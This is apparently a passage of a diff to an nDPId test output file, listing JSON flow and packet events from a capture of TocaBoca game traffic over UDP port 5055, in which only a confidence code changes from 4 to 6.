00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":53,"packets-processed":52,"total-skipped-flows":0,"total-l4-payload-len":6323,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":10,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1649360879587} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1649360879587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1649360879587,"pkt":"YDjgxTWgeJS0JASgCABFAACykLMAADsRfjlbx1F7wKgCZBO\/nWIAnpDwAAAAAosJJVgh87CXAQAAAAAAABQAAAAAAAAAAgAAAn4GAAEAAAAAdgAAAALzBwAAAAgBAUNgLNWb5SaCJAocJvmSqainbl+Oa4DJn3IT4qVSI8qFj6X5DLzbYJpCJ8LrRJdeJ7QpAQUlDLFkzmCIsWSJViCx2U\/siT702DkXpm6dZLrYzkK0dSx2ekQBCbW\/YHJC1uBB"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649358122834,"flow_last_seen":1649358122834,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649360879587,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":33311,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1649361130862,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649361130862,"pkt":"eJS0JASgYDjgxTWgCABFAAA8CW8AAD8RAfTAqAJkW8dRe4EAE78AKIZgFuYAAQAANV9LWFVQAf8AAAAAABQAAAAAAAAAAosM+h4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649360879587,"flow_last_seen":1649360879587,"flow_idle_time":200000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1649361130862,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":40290,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361166006,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1649361166006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649361166006,"pkt":"eJS0JASgYDjgxTWgCABFAAA8JwkAAD8R5FnAqAJkW8dRe94gE78AKB4+Pk0AAQAADyI7JuZnAQAAAAAAABQAAAAAAAAAA4sNhA4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361166006,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649361166006,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":56,"packets-processed":55,"total-skipped-flows":0,"total-l4-payload-len":6537,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":13,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1649411629031} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1649411629031,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649411629031,"pkt":"eJS0JASgYDjgxTWgCABFAAA8d50AAD8Rk8XAqAJkW8dRe8WoE78AKHeQB0IAAQAAAiMEvRHkAQAAAAAAABQAAAAAAAAAA44Pjyk="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361166006,"flow_last_seen":1649361166006,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":56864,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649361130862,"flow_last_seen":1649361130862,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411629031,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":33024,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411716027,"flow_last_seen":1649411716027,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649411716027,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1649411716027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649411716027,"pkt":"eJS0JASgYDjgxTWgCABFAABUunoAAD8RUNDAqAJkW8dRe4tXE78AQP8+\/\/8AAQAAC5da0+3vAv8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411716027,"flow_last_seen":1649411716027,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649411716027,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411716027,"flow_last_seen":1649411716027,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649411716027,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1649411716065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649411716065,"pkt":"YDjgxTWgeJS0JASgCABFAABoQ8IAADsRy3Rbx1F7wKgCZBO\/i1cAVB6VAAAAAo4Q4z9a0+3vAf8AAAAAABQAAAAAAAAAAQAAC5cD\/wEAAAAALAAAAABsIQSwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1649411716491,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649411716491,"pkt":"eJS0JASgYDjgxTWgCABFAAA8uuUAAD8RUH3AqAJkW8dRe4tXE78AKLqHbCEAAQAADWha0+3vAf8AAAAAABQAAAAAAAAAAI4Q4z8="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411857970,"flow_last_seen":1649411857970,"flow_idle_time":200000,"flow_min_l4_payload_len":453,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":453,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1649411857970,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":37167,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1649411857970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":495,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":495,"pkt_l4_len":461,"thread_ts_msec":1649411857970,"pkt":"YDjgxTWgeJS0JASgCABFAAHhCAgAADsRBbZbx1F7wKgCZBO\/kS8Bza5qAAAAAo4TDaEsoxytBwAAAAAAACAAAAACAAAAAfME4gPjDRYC5Q03COQN3wMGAAEAAAABmQAAAAPzA+YAAAgC3x7dB4ADNjVOQzAyZGNzN0NUenlXakNnbnRIZGQ4Uzc2NXZZeXdsTy9qM3pYcW9OdGpvRkozdTlGZHFjeUVpeksvdktmMy9IdldhSkwySW9EdW9Ia0VPSE1sYkQ2aHlPVlBGZkpSaEtxUnRuZUVYNUdGZ0NMRkF1WGl1ai9FdHd2RWFRdURVM3dUZXY3WTFCZ0pqL0tHaHhVdnBDWHpLWkFIb3ZVdkVZNDk0dmFMQSswNlJrUHBXNnVJNU9JYzZSaU5ZODhuK0RtYTRtdm11bGZQakZzQWxCNlE2WlZWZGpoWnJOV1NQcjlaL0ROR2VaUlRFNEc4aEFJZDRrRVl4ZWExZE1UU2Y0cHhmL3RibndmcVdvQ2JWNmhsbE5nSkt3akF0REkxQUV3cmZVeUdxLytxaUc3S2RWVXpDRndMSDVUdWRCRU1vak5XTjlNM0RsV0FHZnBtaW14T1g1S2pmWWw2WkhLV3RKRmhuNUM4dmN6dXZWTTdJZENXeXZzWWl3Umhuam9O"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411857970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411857970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":73,"packets-processed":72,"total-skipped-flows":0,"total-l4-payload-len":8692,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":16,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":78,"global_ts_msec":1649756653649} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1649756653649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649756653649,"pkt":"YDjgxTWgeJS0JASgCABFAAA8JawAADsR6bdbx1F6wKgCZBO\/hscAKBKXAAAAAa\/cVZosVa4ZAQAAAAAAABQAAAAAAAAABAAAATQ="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411857970,"flow_last_seen":1649411857970,"flow_idle_time":200000,"flow_min_l4_payload_len":453,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":453,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":37167,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411857970,"flow_last_seen":1649411857970,"flow_idle_time":200000,"flow_min_l4_payload_len":453,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":453,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":37167,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 